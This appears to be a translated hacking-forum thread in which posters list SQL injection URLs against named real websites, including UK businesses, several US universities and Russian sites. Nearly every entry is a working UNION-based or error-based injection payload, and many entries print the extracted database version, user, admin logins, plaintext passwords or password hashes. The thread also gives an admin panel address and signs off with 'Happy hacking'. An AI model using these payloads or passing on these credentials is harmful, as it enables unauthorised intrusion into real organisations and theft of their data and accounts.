www.ateme.com 4.1.11-Debian_4sarge7-log: atemeweb@localhost: atemeweb Once again I couldn't guess the column names. There is no admin table.
http://www.creditman.biz/ The UK's Leading Resource for Businesses and Credit Professionals The admin of this site is paranoid: not only did he create a dozen or so fake tables with admin in their names, columns with logins and passwords, and so on, his login and password are 64 characters each!!! Then again, it is finance-related... I'm outputting them separately, since together they don't fit in the output: Login: $uC&b+bAz&!#+e@6*cR5yaHec-utr?th7kustuz&ZuDrusp6mAweswAcre7Wu3Ab Code: http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+username+from+Administration)-- Password: #r@kep*uX_th*b2xutRa52rey-paruna$ukeG5*Hep-phe9aj#swapeth7Phachu Code: http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+password+from+Administration)-- Admin panel: https://www.creditman.biz/uk/admin/default.asp Happy hacking =)
http://www.education.ex.ac.uk/dll/pages.php?id=-242+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12/* [email protected]:sell:4.1.20-log but beyond that, no hack =\
http://www.sopka.net/?pg=1&id=106106&owner=-1+union+select+concat_ws(0x2F,version(),database(),user())/* 4.0.27-max-log/tiba102/[email protected] ----------------------------------------------------------------------------- http://www.probilliard.info/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11/* 4.0.27-log/vh04971/[email protected] ----------------------------------------------------------------------------- http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,version(),database(),user())/* 5.0.45-log/u33748/[email protected] http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,login,password)+from+u33748_otelrent.b_users+limit+0,1/* login/hash in the title root/be601c6844923ee53211c35603ff0b52
www.firstfordrivers.co.uk 5.0.24-standard-log:firstfordrivers_co_uk:first4drivers@localhost sherry:586e56fa6ed25d6392861a85bccb45e6f64f8e86:10 The rest can be output using LIMIT.
http://www.lunarenergy.co.uk/ Code: http://www.lunarenergy.co.uk/newsDetail.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,convert(username+using+latin1),convert(password+using+latin1)),7+from+admin/* scadesign:scadoo http://www.warrenpointharbour.co.uk/ Code: http://www.warrenpointharbour.co.uk/general.php?id=-1+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9,10,11/* http://www.graysofwestminster.co.uk/ Code: http://www.graysofwestminster.co.uk/newsitem.php?id=-1+union+select+1,convert(version()+using+latin1),3,4,5,6/* http://www.newrowfarmnurseries.co.uk/ Code: http://www.newrowfarmnurseries.co.uk/show_item.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* http://www.inova.unicamp.br/ Code: http://www.inova.unicamp.br/inovanosmunicipios/artigos_detail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/*
Some obscure Ukrainian CMS, FreshKnowledge. CMS site: http://www.freshknowledge.net/ Developer's site: http://www.setlab.net/ The forum is vulnerable; there are probably plenty of SQL injections there, but I didn't dig further, since it's of no particular interest. Code: http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* More examples: Code: http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* Code: http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* Code: http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
edu Went through the edu sites again, please welcome: www.gatech.edu Georgia Institute of Technology Code: http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* 5.0.37 www.history.msu.edu Department of History - Michigan State University Code: http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* 4.1.11-Debian_4sarge7-log : [email protected] : dpthistory2 www.montana.edu Montana State University Code: http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 4.0.17
Here's one more edu site: Code: http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/*
Code: http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+member/* Code: http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*
http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) -------------------------------------------------------------------------- http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,version(),database(),user())/* 4.0.27-max-log/utsport1_db01/[email protected] -------------------------------------------------------------------------- http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5/* 4.0.26/u63709/[email protected] -------------------------------------------------------------------------- echoperm.ru http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*&part_id=2&class=news 4.1.20-log/echotest/echotest@localhost http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news login/hash/email all at once admin/f609688322a2811966aeb9aca67e2557/[email protected]
Code: http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7,8,9+from+content/* Code: http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/* Code: http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/* Code: https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14/* Code: http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*
Code: http://itsoft.ru/search/?search_query='&in_cat=' Code: http://cs-server.ru/news/detail/?item_id='
Code: http://mathinfo.montclair.edu/undergrad_research/profile.php?id=-48+union+select+1,concat(user(),0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* mathweb@localhost:4.0.18-standard-logmath
Code: http://www.gangrule.com/gangs.php?ID=-1+union+select+user()/* oldtapes_gangrul@localhost 4.1.22-standard-log oldtapes_gangrulecom Code: http://www.fikb.it/news.asp?id=-1' Errore SQL Errore di run-time di Microsoft VBScript error '800a01a8' Necessario oggetto: 'DBRecordSet(...)' Code: http://www.scamshield.com/Feature.asp?id=-1' Code: http://www.anchem.ru/catalog/dirCat.asp?id=-1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = -1'''. /catalog/dirCat.asp, line 15 Code: http://www.r66-rabota.ru/post.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* Code: http://www.socket2000.com/index.asp?id=-1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'category=-1' and active=true order by xdate desc'. /includes/include_functions.asp, line 10 Code: http://www.scamshield.com/Feature.asp?id=-1' Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'ArticleNumber = -1''. /Feature.asp, line 21
Code: http://ecodefense.ru/view.php?id=-503+union+select+1,2,3,4,5,6,7,8,9,VERSION(),11/* Code: http://www.hoglezoo.org/animals/view.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*
Code: http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,version(),4,user(),6,7+from+information_schema.tables/* 5.0.32-Debian_7etch1-log viking1@localhost